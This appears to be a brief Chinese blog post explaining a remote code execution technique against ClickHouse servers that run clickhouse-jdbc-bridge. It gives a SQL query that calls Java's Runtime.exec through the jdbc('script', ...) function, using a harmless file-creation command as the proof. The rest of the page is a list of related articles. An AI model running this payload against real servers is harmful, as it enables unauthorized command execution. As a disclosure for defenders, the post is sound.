clickhouse-jdbc-bridge rce

  • 开发
  • 21

clickhouse-jdbc-bridge 是什么

JDBC bridge for ClickHouse®. It acts as a stateless proxy passing queries from ClickHouse to external datasources. With this extension, you can run distributed query on ClickHouse across multiple datasources in real time, which in a way simplifies the process of building data pipelines for data warehousing, monitoring and integrity check etc.
简单来说是clickhouse服务端的一个组件 功能是用来创建新的jdbc连接
https://github.com/ClickHouse/clickhouse-jdbc-bridge

RCE

当我们连接到clickhouse的时候,如果服务端支持clickhouse-jdbc-bridge
那么可以输入以下命令RCE

SELECT *
FROM jdbc('script', 's=[3];s[0]="/bin/bash";s[1]="-c";s[2]="touch /tmp/1.txt";java.lang.Runtime.getRuntime().exec(s);')

在这里插入图片描述
然后可以在服务器端/tmp目录下看到1.txt

阅读全部

相关推荐

  3. ClickHouse(17)ClickHouse集成JDBC表引擎详细解析

    2024-07-09 17:06:09       49 阅读

  4. JDBC*

    2024-07-09 17:06:09       42 阅读
  5. Hive <span style='color:red;'>JDBC</span>

    Hive JDBC

    2024-07-09 17:06:09      44 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-09 17:06:09       50 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-09 17:06:09       54 阅读

  9. 在Django里面运行非项目文件

    2024-07-09 17:06:09       43 阅读

  19. Python语言-面向对象

    2024-07-09 17:06:09       54 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-09 17:06:09       50 阅读

热门阅读

  4. 牛客周赛 Round 50

    2024-07-09 17:06:09       34 阅读

  6. 量化机器人如何提高投资效率?

    2024-07-09 17:06:09       24 阅读

  10. Emacs相关

    2024-07-09 17:06:09       27 阅读

  13. 细水长流:SKlearn中模型的增量训练实践

    2024-07-09 17:06:09       27 阅读

  14. 论如何搭建属于自己的服务器?

    2024-07-09 17:06:09       18 阅读

  16. RabbitMQ实现延迟消息

    2024-07-09 17:06:09       44 阅读

  17. 【数据挖掘】银行信用卡风险大数据分析与挖掘

    2024-07-09 17:06:09       19 阅读

  22. emacs 重新加载磁盘上的文件

    2024-07-09 17:06:09       22 阅读

  24. Linux学习笔记(一)

    2024-07-09 17:06:09       26 阅读

  28. 用WPF实现的窗体是怎么运行的?

    2024-07-09 17:06:09       25 阅读